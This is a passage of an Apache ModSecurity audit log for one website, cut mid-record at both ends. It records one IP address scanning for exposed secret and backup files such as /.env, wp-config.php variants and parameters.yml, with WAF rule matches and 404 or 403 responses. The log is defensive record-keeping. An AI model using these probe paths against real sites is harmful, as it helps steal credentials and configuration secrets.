phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/staging2/.env"] [unique_id "aFBq0X3hoSwVUy254pH0PAAAACQ"] Stopwatch: 1750100689063704 3198 (- - -) Stopwatch2: 1750100689063704 3198; combined=1925, p1=382, p2=1489, p3=0, p4=0, p5=53, sr=112, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0f819a7c-Z-- --5edf9252-A-- [17/Jun/2025:00:34:49.177448 +0530] aFBq0ZlL5_2Zd8wUdfLJDQAAAAg 185.177.72.201 36522 127.0.0.1 7080 --5edf9252-B-- GET /awstats/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --5edf9252-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --5edf9252-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/awstats/.env"] [unique_id "aFBq0ZlL5_2Zd8wUdfLJDQAAAAg"] Stopwatch: 1750100689174181 3321 (- - -) Stopwatch2: 1750100689174181 3321; combined=1996, p1=388, p2=1552, p3=0, p4=0, p5=56, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5edf9252-Z-- --009a1f37-A-- [17/Jun/2025:00:34:49.399154 +0530] aFBq0RwcFb_n1P0IC9xlSwAAAAo 185.177.72.201 42416 127.0.0.1 7080 --009a1f37-B-- GET /config.dat HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --009a1f37-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --009a1f37-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".dat"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".dat"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/config.dat"] [unique_id "aFBq0RwcFb_n1P0IC9xlSwAAAAo"] Stopwatch: 1750100689395938 3269 (- - -) Stopwatch2: 1750100689395938 3269; combined=1956, p1=348, p2=1551, p3=0, p4=0, p5=57, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --009a1f37-Z-- --b5495368-A-- [17/Jun/2025:00:34:50.172509 +0530] aFBq0h6Azi2u_ik2Q3KpHgAAAAY 185.177.72.201 42494 127.0.0.1 7080 --b5495368-B-- GET /.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --b5495368-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --b5495368-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/.env"] [unique_id "aFBq0h6Azi2u_ik2Q3KpHgAAAAY"] Stopwatch: 1750100690169082 3481 (- - -) Stopwatch2: 1750100690169082 3481; combined=2101, p1=433, p2=1616, p3=0, p4=0, p5=52, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b5495368-Z-- --a5eed454-A-- [17/Jun/2025:00:34:50.283050 +0530] aFBq0pVkCcfT-Z8NQYyU2gAAAAc 185.177.72.201 42498 127.0.0.1 7080 --a5eed454-B-- GET /composer.json HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --a5eed454-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --a5eed454-H-- Message: Warning. Matched phrase "/composer.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/composer.json"] [unique_id "aFBq0pVkCcfT-Z8NQYyU2gAAAAc"] Stopwatch: 1750100690279805 3310 (- - -) Stopwatch2: 1750100690279805 3310; combined=1926, p1=412, p2=1458, p3=0, p4=0, p5=56, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a5eed454-Z-- --6e6d1c50-A-- [17/Jun/2025:00:34:50.837496 +0530] aFBq0hwcFb_n1P0IC9xlTwAAAAo 185.177.72.201 42556 127.0.0.1 7080 --6e6d1c50-B-- GET /app/config/parameters.yml HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6e6d1c50-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --6e6d1c50-H-- Message: Warning. Matched phrase "/config/parameters.yml" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/config/parameters.yml" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/app/config/parameters.yml"] [unique_id "aFBq0hwcFb_n1P0IC9xlTwAAAAo"] Stopwatch: 1750100690834085 3466 (- - -) Stopwatch2: 1750100690834085 3466; combined=2017, p1=445, p2=1516, p3=0, p4=0, p5=56, sr=109, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6e6d1c50-Z-- --d4044e76-A-- [17/Jun/2025:00:34:50.945657 +0530] aFBq0plL5_2Zd8wUdfLJEgAAAAg 185.177.72.201 42570 127.0.0.1 7080 --d4044e76-B-- GET /.htaccess.save HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d4044e76-F-- HTTP/1.1 403 Forbidden Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "31b-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 795 Connection: close Content-Type: text/html --d4044e76-H-- Message: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/.htaccess.save"] [unique_id "aFBq0plL5_2Zd8wUdfLJEgAAAAg"] Apache-Error: [file "mod_authz_core.c"] [line 879] [level 3] AH01630: client denied by server configuration: /var/www/vhosts/surbhiprintographics.com/httpdocs/.htaccess.save Stopwatch: 1750100690944795 941 (- - -) Stopwatch2: 1750100690944795 941; combined=462, p1=390, p2=0, p3=0, p4=0, p5=72, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d4044e76-Z-- --61956753-A-- [17/Jun/2025:00:34:51.055968 +0530] aFBq043q6eGJ2xNcTd6G2gAAAAU 185.177.72.201 42572 127.0.0.1 7080 --61956753-B-- GET /old/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --61956753-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --61956753-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/old/.env"] [unique_id "aFBq043q6eGJ2xNcTd6G2gAAAAU"] Stopwatch: 1750100691052954 3066 (- - -) Stopwatch2: 1750100691052954 3066; combined=1787, p1=366, p2=1366, p3=0, p4=0, p5=55, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --61956753-Z-- --84741526-A-- [17/Jun/2025:00:34:51.277770 +0530] aFBq0x6Azi2u_ik2Q3KpIQAAAAY 185.177.72.201 42592 127.0.0.1 7080 --84741526-B-- GET /.old HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --84741526-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --84741526-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/.old"] [unique_id "aFBq0x6Azi2u_ik2Q3KpIQAAAAY"] Stopwatch: 1750100691274620 3203 (- - -) Stopwatch2: 1750100691274620 3203; combined=1890, p1=344, p2=1490, p3=0, p4=0, p5=56, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --84741526-Z-- --27b49306-A-- [17/Jun/2025:00:34:51.388043 +0530] aFBq05VkCcfT-Z8NQYyU3QAAAAc 185.177.72.201 42598 127.0.0.1 7080 --27b49306-B-- GET /wp-config.php.7 HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --27b49306-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --27b49306-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php.7"] [unique_id "aFBq05VkCcfT-Z8NQYyU3QAAAAc"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/surbhiprintographics.com/httpdocs/wp-config.php.7' not found or unable to stat Stopwatch: 1750100691385010 3132 (- - -) Stopwatch2: 1750100691385010 3132; combined=1823, p1=377, p2=1380, p3=0, p4=0, p5=66, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --27b49306-Z-- --70eb6150-A-- [17/Jun/2025:00:34:51.498635 +0530] aFBq0yid3pHxA3RhGpzqOQAAAAk 185.177.72.201 42618 127.0.0.1 7080 --70eb6150-B-- GET /install.php.backup HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --70eb6150-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --70eb6150-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/install.php.backup"] [unique_id "aFBq0yid3pHxA3RhGpzqOQAAAAk"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/surbhiprintographics.com/httpdocs/install.php.backup' not found or unable to stat Stopwatch: 1750100691496473 2217 (- - -) Stopwatch2: 1750100691496473 2217; combined=1304, p1=259, p2=991, p3=0, p4=0, p5=54, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --70eb6150-Z-- --e7684329-A-- [17/Jun/2025:00:34:51.940065 +0530] aFBq01JfblPUQiSn5r1howAAAAA 185.177.72.201 42642 127.0.0.1 7080 --e7684329-B-- GET /config.inc.bak HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --e7684329-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --e7684329-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".inc.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".inc.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/config.inc.bak"] [unique_id "aFBq01JfblPUQiSn5r1howAAAAA"] Stopwatch: 1750100691936749 3383 (- - -) Stopwatch2: 1750100691936749 3383; combined=2036, p1=351, p2=1620, p3=0, p4=0, p5=65, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e7684329-Z-- --86ff923a-A-- [17/Jun/2025:00:34:52.050632 +0530] aFBq1B6Azi2u_ik2Q3KpIwAAAAY 185.177.72.201 42650 127.0.0.1 7080 --86ff923a-B-- GET /login.php.bak HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --86ff923a-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --86ff923a-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/login.php.bak"] [unique_id "aFBq1B6Azi2u_ik2Q3KpIwAAAAY"] Stopwatch: 1750100692047176 3510 (- - -) Stopwatch2: 1750100692047176 3510; combined=2077, p1=365, p2=1652, p3=0, p4=0, p5=60, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --86ff923a-Z-- --807a910b-A-- [17/Jun/2025:00:34:52.426847 +0530] aFBq1H8PxMRZ7s11niQJ5gAAAAI 185.177.72.201 42676 127.0.0.1 7080 --807a910b-B-- GET /wp-config.php_new HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --807a910b-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --807a910b-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php_new"] [unique_id "aFBq1H8PxMRZ7s11niQJ5gAAAAI"] Stopwatch: 1750100692423282 3634 (- - -) Stopwatch2: 1750100692423282 3634; combined=2064, p1=515, p2=1493, p3=0, p4=0, p5=56, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --807a910b-Z-- --9df72c63-A-- [17/Jun/2025:00:34:52.539895 +0530] aFBq1JlL5_2Zd8wUdfLJFgAAAAg 185.177.72.201 42686 127.0.0.1 7080 --9df72c63-B-- GET /wp-config.php.1 HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --9df72c63-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --9df72c63-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php.1"] [unique_id "aFBq1JlL5_2Zd8wUdfLJFgAAAAg"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/surbhiprintographics.com/httpdocs/wp-config.php.1' not found or unable to stat Stopwatch: 1750100692537120 2831 (- - -) Stopwatch2: 1750100692537120 2831; combined=1649, p1=340, p2=1220, p3=0, p4=0, p5=89, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9df72c63-Z-- --697a8851-A-- [17/Jun/2025:00:34:52.871987 +0530] aFBq1BwcFb_n1P0IC9xlVAAAAAo 185.177.72.201 42736 127.0.0.1 7080 --697a8851-B-- GET /admin/.config HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --697a8851-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --697a8851-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/admin/.config"] [unique_id "aFBq1BwcFb_n1P0IC9xlVAAAAAo"] Stopwatch: 1750100692869316 2727 (- - -) Stopwatch2: 1750100692869316 2727; combined=1521, p1=334, p2=1136, p3=0, p4=0, p5=51, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: 